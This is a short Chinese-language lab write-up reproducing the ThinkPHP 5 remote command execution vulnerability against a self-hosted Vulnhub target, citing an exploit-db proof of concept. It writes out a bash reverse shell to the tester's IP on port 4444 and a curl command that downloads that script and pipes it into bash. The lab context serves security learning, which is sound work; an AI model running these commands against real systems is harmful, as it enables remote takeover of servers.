鄭重聲明:所用漏洞環(huán)境為自建虛擬機vulnhub靶機環(huán)境,僅供本人學習使用。
漏洞簡述
ThinkPHP是一款運用極廣的PHP開發(fā)框架。其版本5中,由于沒有正確處理控制器名,導致在網(wǎng)站沒有開啟強制路由的情況下(即默認情況下)可以執(zhí)行任意方法,從而導致遠程命令執(zhí)行漏洞。
影響版本:5.0.22、5.1.29
準備環(huán)境
測試機IP:192.168.79.129
靶機IP:192.168.79.131
1. 啟動Vulnhub靶機環(huán)境:

2. 驗證靶機應用啟用成功:

漏洞復現(xiàn)
POC 引用:https://www.exploit-db.com/exploits/46150


準備反彈Shell文件shell.sh
bash -i >& /dev/tcp/192.168.79.129/4444 0>&1
啟http server

使用NC偵聽反彈端口

執(zhí)行命令
curl 192.168.79.129/shell.sh | bash
得到反彈Shell

關閉環(huán)境
